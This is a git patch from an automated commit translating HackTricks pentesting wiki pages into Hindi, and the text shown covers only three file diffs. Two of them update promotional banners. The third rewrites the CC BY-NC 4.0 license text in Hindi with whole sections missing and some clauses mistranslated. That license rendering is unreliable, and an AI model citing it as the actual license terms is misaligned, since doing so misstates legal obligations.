From 78ec4f6652f2a5132ddcc8ebc980b48a49750f9e Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 18 Jul 2024 19:58:30 +0000 Subject: [PATCH] Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md --- 1911-pentesting-fox.md | 42 +- 6881-udp-pentesting-bittorrent.md | 17 +- LICENSE.md | 90 +++-- android-forensics.md | 62 +-- backdoors/icmpsh.md | 38 +- .../README.md | 204 +++++----- burp-suite.md | 48 +-- c2/icmpsh.md | 40 +- .../blockchain-and-crypto-currencies.md | 203 +++++----- .../cipher-block-chaining-cbc-mac-priv.md | 68 ++-- crypto-and-stego/crypto-ctfs-tricks.md | 129 ++----- crypto-and-stego/electronic-code-book-ecb.md | 54 +-- crypto-and-stego/rc4-encrypt-and-decrypt.md | 36 +- .../cipher-block-chaining-cbc-mac-priv.md | 72 ++-- cryptography/crypto-ctfs-tricks.md | 135 +++---- cryptography/electronic-code-book-ecb.md | 49 +-- cryptography/hash-length-extension-attack.md | 54 +-- cryptography/padding-oracle-priv.md | 98 ++--- cryptography/rc4-encrypt-and-decrypt.md | 17 +- emails-vulns.md | 34 +- .../linux-exploiting-basic-esp/fusion.md | 34 +- exploiting/tools/pwntools.md | 72 ++-- ...windows-exploiting-basic-guide-oscp-lvl.md | 80 ++-- .../anti-forensic-techniques.md | 87 +++-- .../docker-forensics.md | 39 +- .../file-integrity-monitoring.md | 48 ++- .../malware-analysis.md | 65 ++-- .../file-data-carving-tools.md | 42 +- .../pcap-inspection/README.md | 82 ++-- .../usb-keyboard-pcap-analysis.md | 36 +- .../pcap-inspection/usb-keystrokes.md | 38 +- .../pcap-inspection/wifi-pcap-analysis.md | 41 +- .../README.md | 36 +- .../desofuscation-vbs-cscript.exe.md | 36 +- .../png-tricks.md | 56 +-- .../video-and-audio-file-analysis.md | 42 +- .../zips-tricks.md | 53 ++- .../windows-forensics/README.md | 217 ++++++----- .../interesting-windows-registry-keys.md | 50 +-- .../windows-forensics/windows-processes.md | 65 ++-- .../docker-forensics.md | 45 +-- .../file-integrity-monitoring.md | 46 ++- .../malware-analysis.md | 67 ++-- .../README.md | 36 +- .../desofuscation-vbs-cscript.exe.md | 36 +- .../png-tricks.md | 56 +-- .../video-and-audio-file-analysis.md | 42 +- .../zips-tricks.md | 53 ++- .../interesting-windows-registry-keys.md | 46 +-- .../exfiltration.md | 82 ++-- .../github-leaked-secrets.md | 44 ++- .../wide-source-code-search.md | 52 +-- .../pentesting-network/dhcpv6.md | 54 +-- .../pentesting-network/eigrp-attacks.md | 61 +-- .../glbp-and-hsrp-attacks.md | 64 +-- .../pentesting-network/ids-evasion.md | 60 +-- .../network-protocols-explained-esp.md | 54 +-- .../pentesting-network/nmap-summary-esp.md | 167 ++++---- .../pentesting-network/pentesting-ipv6.md | 84 ++-- ...-ns-mdns-dns-and-wpad-and-relay-attacks.md | 86 +++-- .../pentesting-wifi/evil-twin-eap-tls.md | 63 ++- .../phishing-methodology/clone-a-website.md | 40 +- .../python/basic-python.md | 158 ++++---- .../python/bruteforce-hash-few-chars.md | 34 +- .../load_name-load_const-opcode-oob-read.md | 78 ++-- ...s-pollution-pythons-prototype-pollution.md | 155 ++++---- .../python/pyscript.md | 38 +- .../python/python-internal-read-gadgets.md | 54 +-- .../shells/README.md | 36 +- .../shells/full-ttys.md | 54 ++- .../shells/windows.md | 202 +++------- interesting-http.md | 51 +-- .../ddexec.md | 74 ++-- .../linux-post-exploitation/README.md | 45 ++- .../containerd-ctr-privilege-escalation.md | 48 ++- ...-command-injection-privilege-escalation.md | 134 ++++--- online-platforms-with-api.md | 91 ++--- other-web-tricks.md | 59 ++- pentesting-dns.md | 35 +- .../lfi2rce-via-nginx-temp-files.md | 364 ++++-------------- .../lfi2rce-via-segmentation-fault.md | 40 +- .../via-php_session_upload_progress.md | 31 +- .../browser-http-request-smuggling.md | 34 +- post-exploitation.md | 57 ++- .../format-strings/format-strings-template.md | 166 +++++++- .../rop-leaking-libc-template.md | 242 ++++++++++++ ...itive-information-disclosure-from-a-web.md | 48 +-- todo/6881-udp-pentesting-bittorrent.md | 17 +- todo/burp-suite.md | 46 +-- todo/emails-vulns.md | 34 +- todo/interesting-http.md | 51 +-- todo/other-web-tricks.md | 57 ++- todo/pentesting-dns.md | 35 +- todo/post-exploitation.md | 57 ++- 94 files changed, 3431 insertions(+), 3241 deletions(-) create mode 100644 reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md index b9e3da6de..3d90e3d30 100644 --- a/1911-pentesting-fox.md +++ b/1911-pentesting-fox.md @@ -1,30 +1,31 @@ -# 1911 - Pentesting fox +# 1911 - पेंटेस्टिंग फॉक्स + +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**. -* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।**
+{% endhint %} और अधिक सेवाएं: -ubiquiti-discover udp "Ubiquiti Networks Device" +ubiquiti-discover udp "Ubiquiti Networks डिवाइस" -dht udp "DHT Nodes" +dht udp "DHT नोड्स" 5060 udp sip "SIP/" ![](<.gitbook/assets/image (273).png>) -![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) +![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>) InfluxDB @@ -38,16 +39,17 @@ InfluxDB ![](<.gitbook/assets/image (341).png>) +{% hint style="success" %} +**AWS हैकिंग सीखें और अभ्यास करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +**GCP हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**. -* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।**
+{% endhint %} diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md index c91f19b61..fb3bf4d87 100644 --- a/6881-udp-pentesting-bittorrent.md +++ b/6881-udp-pentesting-bittorrent.md @@ -1,13 +1,14 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स **शेयर करें**. +* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %} diff --git a/LICENSE.md b/LICENSE.md index 87729913b..79a857054 100644 --- a/LICENSE.md +++ b/LICENSE.md @@ -1,60 +1,88 @@ +{% hint style="success" %} +सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com) -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह -* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter पर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.** -* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %} -Creative Commons License
कॉपीराइट © Carlos Polop 2021. जहां अन्यथा निर्दिष्ट (पुस्तक में कॉपी की गई बाहरी जानकारी मूल लेखकों की है), HACK TRICKS पर Carlos Polop द्वारा लिखित पाठ Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) के तहत लाइसेंस प्राप्त है। -लाइसेंस: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)
-मानव पठनीय लाइसेंस: https://creativecommons.org/licenses/by-nc/4.0/
+क्रिएटिव कॉमन्स लाइसेंस
कॉपीराइट © कार्लोस पोलोप 2021। जहाँ अन्यथा निर्दिष्ट किया गया हो (पुस्तक में कॉपी किए गए बाह्य सूचनाएं मूल लेखकों की संपत्ति है), [**हैक ट्रिक्स**](https://github.com/carlospolop/hacktricks) के लेखक कार्लोस पोलोप द्वारा लाइसेंस दिया गया है अधिकारिक क्रिएटिव कॉमन्स एट्रिब्यूशन-नॉनकमर्शियल 4.0 इंटरनेशनल (सीसी बाई-एनसी 4.0) के तहत। + +लाइसेंस: एट्रिब्यूशन-नॉनकमर्शियल 4.0 इंटरनेशनल (सीसी बाई-एनसी 4.0)
+मानव अधिकार लाइसेंस: https://creativecommons.org/licenses/by-nc/4.0/
पूर्ण कानूनी शर्तें: https://creativecommons.org/licenses/by-nc/4.0/legalcode
-फॉर्मेटिंग: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
+स्वरूपण: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
+## खंड 2 – दायरा। -# creative commons +a. ___लाइसेंस अनुमति।___ -# Attribution-NonCommercial 4.0 International +1. इस सार्वजनिक लाइसेंस की शर्तों और स्थितियों के अधीन, लाइसेंसर यहाँ आपको एक वैश्विक, रॉयल्टी-मुक्त, गैर-सबलाइसेंसेबल, गैर-अनन्य, अप्रत्याशित लाइसेंस प्रदान करता है जिसके अंतर्गत आपको लाइसेंस प्राप्त सामग्री में लाइसेंसिंग अधिकार का प्रयोग करने की अनिवार्य अनुमति है: -Creative Commons Corporation (“Creative Commons”) कोई कानूनी फर्म नहीं है और वह कानूनी सेवाएं या कानूनी सलाह प्रदान नहीं करता है। Creative Commons सार्वजनिक लाइसेंसों का वितरण किसी वकील-ग्राहक या अन्य संबंध का निर्माण नहीं करता है। Creative Commons अपने लाइसेंस और संबंधित जानकारी "जैसी है" आधार पर उपलब्ध कराता है। Creative Commons अपने लाइसेंसों, किसी भी सामग्री जो उनकी शर्तों और शर्तों के तहत लाइसेंस प्राप्त है, या किसी भी संबंधित जानकारी के बारे में कोई वारंटी नहीं देता है। Creative Commons उनके उपयोग से होने वाली किसी भी क्षति के लिए सभी दायित्वों से इनकार करता है। +A. केवल गैर-वाणिज्यिक उद्देश्यों के लिए, पूरी या अंशदारी लाइसेंसिंग सामग्री को पुनर्उत्पादित और साझा करना; और -## Creative Commons Public Licenses का उपयोग करना +B. गैर-वाणिज्यिक उद्देश्यों के लिए सिर्फ उत्पादित, पुनर्उत्पादित और साझा किया गया सामग्री को साझा करना। -Creative Commons सार्वजनिक लाइसेंस एक मानक सेट प्रदान करते हैं जिसे रचनाकार और अन्य अधिकार धारक कॉपीराइट और कुछ अन्य अधिकारों द्वारा संरक्षित सामग्री को साझा करने के लिए उपयोग कर सकते हैं। निम्नलिखित विचार केवल सूचनात्मक उद्देश्यों के लिए हैं, समाप्त नहीं हैं, और हमारे लाइसेंसों का हिस्सा नहीं बनते हैं। +2. __अपवाद और सीमाएँ।__ स्पष्टता के लिए, जहाँ अपवाद और सीमाएँ आपके उपयोग पर लागू होती हैं, इस सार्वजनिक लाइसेंस का अनुपालन नहीं होता है, और आपको इसकी शर्तों और स्थितियों का पालन करने की आवश्यकता नहीं है। -* __लाइसेंस देने वालों के लिए विचार:__ हमारे सार्वजनिक लाइसेंस उन लोगों द्वारा उपयोग के लिए इरादा हैं जो सामग्री को कॉपीराइट और कुछ अन्य अधिकारों द्वारा अन्यथा प्रतिबंधित तरीकों में उपयोग करने के लिए सार्वजनिक अनुमति देने के लिए अधिकृत हैं। हमारे लाइसेंस अपरिवर्तनीय हैं। लाइसेंस देने वालों को इसे लागू करने से पहले वे चुने गए लाइसेंस की शर्तों और शर्तों को पढ़ना और समझना चाहिए। लाइसेंस देने वालों को यह भी सुनिश्चित करना चाहिए कि वे हमारे लाइसेंस लागू करने से पहले सभी आवश्यक अधिकारों को सुरक्षित करें ताकि सार्वजनिक रूप से सामग्री का पुन: उपयोग कर सकें। लाइसेंस देने वालों को उस सामग्री को स्पष्ट रूप से चिह्नित करना चाहिए जो लाइसेंस के अधीन नहीं है। इसमें अन्य CC-लाइसेंस प्राप्त सामग्री, या कॉपीराइट के अपवाद या सीमा के तहत उपयोग की गई सामग्री शामिल है। [लाइसेंस देने वालों के लिए अधिक विचार](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). +3. __अवधि।__ इस सार्वजनिक लाइसेंस की अवधि खंड 6(a) में निर्दिष्ट की गई है। -* __सार्वजनिक के लिए विचार:__ हमारे सार्वजनिक लाइसेंसों में से एक का उपयोग करके, एक लाइसेंस देने वाला सार्वजनिक को निर्दिष्ट शर्तों और शर्तों के तहत लाइसेंस प्राप्त सामग्री का उपयोग करने की अनुमति देता है। यदि किसी भी कारण से लाइसेंस देने वाले की अनुमति आवश्यक नहीं है–उदाहरण के लिए, कॉपीराइट के किसी भी लागू अपवाद या सीमा के कारण–तो वह उपयोग लाइसेंस द्वारा विनियमित नहीं है। हमारे लाइसेंस केवल कॉपीराइट और कुछ अन्य अधिकारों के तहत अनुमतियां प्रदान करते हैं जिन्हें लाइसेंस देने वाला अनुदान देने का अधिकार रखता है। लाइसेंस प्राप्त सामग्री का उपयोग अन्य कारणों से भी प्रतिबंधित हो सकता है, जिसमें यह भी शामिल है कि अन्य लोगों के पास सामग्री में कॉपीराइट या अन्य अधिकार हो सकते हैं। एक लाइसेंस देने वाला विशेष अनुरोध कर सकता है, जैसे कि सभी परिवर्तनों को चिह्नित या वर्णित करने का अनुरोध करना। हालांकि हमारे लाइसेंसों द्वारा आवश्यक नहीं है, आपको उचित होने पर उन अनुरोधों का सम्मान करने की सलाह दी जाती है। [सार्वजनिक के लिए अधिक विचार](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). +4. __मीडिया और प्रारूप; तकनीकी संशोधन अनुमत है।__ लाइसेंसर आपको सभी मीडिया और प्रारूपों में लाइसेंसिंग अधिकार का प्रयोग करने की अनुमति देता है चाहे वे अभी जाने वाले हों या भविष्य में बनाए गए हों, और तकनीकी संशोधन करने की आवश्यकता हो। लाइसेंसर ने यह अधिकार वापस लेने या आपको तकनीकी संशोधन करने से रोकने का कोई अधिकार या अधिकार दावा करने का कोई अधिकार नहीं देने का सहमति दी है। इस सार्वजनिक लाइसेंस के लिए, इस खंड 2(a)(4) द्वारा अधिकृत संशोधन करना कभी भी उत्पादित सामग्री नहीं उत्पन्न करता। -# Creative Commons Attribution-NonCommercial 4.0 International Public License +5. __निचले प्राप्तकर्ता।__ -लाइसेंस प्राप्त अधिकारों (नीचे परिभाषित) का अभ्यास करके, आप इस Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License") की शर्तों और शर्तों से बंधे होने के लिए सहमत होते हैं। इस Public License को एक अनुबंध के रूप में व्याख्या की जा सकती है, आपको इन शर्तों और शर्तों की स्वीकृति के विचार में लाइसेंस प्राप्त अधिकार दिए जाते हैं, और लाइसेंस देने वाला आपको इन शर्तों और शर्तों के तहत लाइसेंस प्राप्त सामग्री उपलब्ध कराने से प्राप्त लाभों के विचार में ऐसे अधिकार देता है। +A. __लाइसेंसर से प्रस्ताव – लाइसेंसिंग सामग्री।__ लाइसेंसिंग सामग्री के प्रत्येक प्राप्तकर्ता को स्वचालित रूप से लाइसेंसर से एक प्रस्ताव प्राप्त होता है जिसके अंतर्गत वे इस सार्वजनिक लाइसेंस की शर्तों और स्थितियों के अनुसार लाइसेंसिंग अधिकार का प्रयोग कर सकते हैं। -## धारा 1 – परिभाषाएँ। +B. __कोई निचले प्रतिबंध नहीं।__ यदि आप लाइसेंसिंग सामग्री का प्रयोग करने वाले किसी प्राप्तकर्ता के द्वारा लाइसेंसिंग अधिकार का प्रयोग करने में रोक लगाते हैं, तो आप किसी भी अतिरिक्त या विभिन्न शर्तों या स्थितियों का प्रस्ताव नहीं कर सकते। -a. __अनुकूलित सामग्री__ का अर्थ है कॉपीराइट और समान अधिकारों के अधीन सामग्री जो लाइसेंस प्राप्त सामग्री से व्युत्पन्न होती है या उसके आधार पर होती है +6. __कोई समर्थन नहीं।__ इस सार्वजनिक लाइसेंस में कुछ भी नहीं है जो यह सिद्ध करने या इसे इस सार्वजनिक लाइसेंस के अंतर्गत आपका उपयोग, या लाइसेंसर या अन्य व्यक्ति जिन्हें धारात्मक रूप से प्राप्त किया जाता है, से जुड़ा है, या समर्थित, या आधिकृत रूप से दिया गया है, के साथ जोड़ सकता है। + +b. ___अन्य अधिकार।___ + +1. नैतिक अधिकार, जैसे सत्यापन का अधिकार, इस सार्वजनिक लाइसेंस के अंतर्गत लाइसेंस नहीं हैं, न कि प्रचार, गोपनीयता, और/या अन्य समकक्ष व्यक्तित्व अधिकार; हालांकि, जितना संभव हो, लाइसेंसर ने ऐसे अधिकारों का असर न करने या अनुसार करने के लिए जो लाइसेंसर द्वारा धारित किए जाते हैं, उस सीमा तक आपको अनुमति देने या अनुसार करने की सहमति दी है, लेकिन अन्यथा नहीं। + +2. पेटेंट और ट्रेडमार्क अधिकार इस सार्वजनिक लाइसेंस के अंतर्गत लाइसेंस नहीं हैं। + +3. जितना संभव हो, लाइसेंसर ने आपसे लाइसेंसिंग अधिकार का प्रयोग करने के लिए आपसे राजस्व वसूलने का कोई अधिकार नहीं है, सीधे या किसी भी स्वेच्छिक या वायव्यक्तिक लाइसेंसिंग योजना के तहत किसी संग्रहण समिति के माध्यम से। अन्य सभी मामलों में लाइसेंसर व्यक्तिगत उद्देश्यों के लिए लाइसेंसिंग सामग्री का उपयोग किया जाता है, तो लाइसेंसर व्यक्तिगत रूप से ऐसे राजस्व वसूलने का कोई अधिकार सुरक्षित रखता है, जिसमें शामिल है जब लाइसेंसिंग सामग्री का गैर-वाणिज्यिक उद्देश्यों के लिए उपयोग किया जाता है। +## खंड 7 - अन्य शर्तें और नियम। + +a. लाइसेंसदाता को आप द्वारा संचारित किसी भी अतिरिक्त या विभिन्न शर्तों या नियमों से बाँधा नहीं जाएगा जब तक व्यक्तिगत रूप से सहमति न हो। + +b. लाइसेंस प्राप्त सामग्री के बारे में किसी भी व्यवस्थाओं, समझौतों या समझौतों के बारे में जो इसमें उल्लिखित नहीं हैं, वे इस सार्वजनिक लाइसेंस के नियमों और शर्तों से अलग हैं। + +## खंड 8 - व्याख्या। + +a. स्पष्टीकरण के लिए, यह सार्वजनिक लाइसेंस किसी भी लाइसेंस प्राप्त सामग्री के किसी भी उपयोग पर किसी अनुमति के बिना किया जा सकता है, नहीं करेगा, और नहीं व्याख्या किया जाएगा। + +b. जितना संभव हो, यदि इस सार्वजनिक लाइसेंस का कोई प्रावधान अमान्य माना जाता है, तो इसे इसे कार्यान्वित करने के लिए आवश्यक न्यूनतम सीमा तक स्वचालित रूप से सुधारा जाएगा। यदि प्रावधान को सुधारा नहीं जा सकता है, तो यह सार्वजनिक लाइसेंस से अलग कर दिया जाएगा बिना बाकी नियमों और शर्तों की कार्यान्वितता पर कोई प्रभाव डाले। + +c. इस सार्वजनिक लाइसेंस का कोई भी शर्त या नियम माफ़ नहीं किया जाएगा और कोई भी अवहेलना की अनुमति नहीं दी जाएगी जब तक लाइसेंसदाता द्वारा स्पष्ट रूप से सहमति न हो। + +d. इस सार्वजनिक लाइसेंस में कुछ भी नहीं है जो लाइसेंसदाता या आप पर लागू होने वाली किसी भी विशेषाधिकार और शासनाधिकारों की किसी सीमा के रूप में या इससे विवादित रूप से व्याख्या की जा सकती है। ``` Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` +{% hint style="success" %} +**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte) + +**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! -* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com) -* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह -* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में. +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
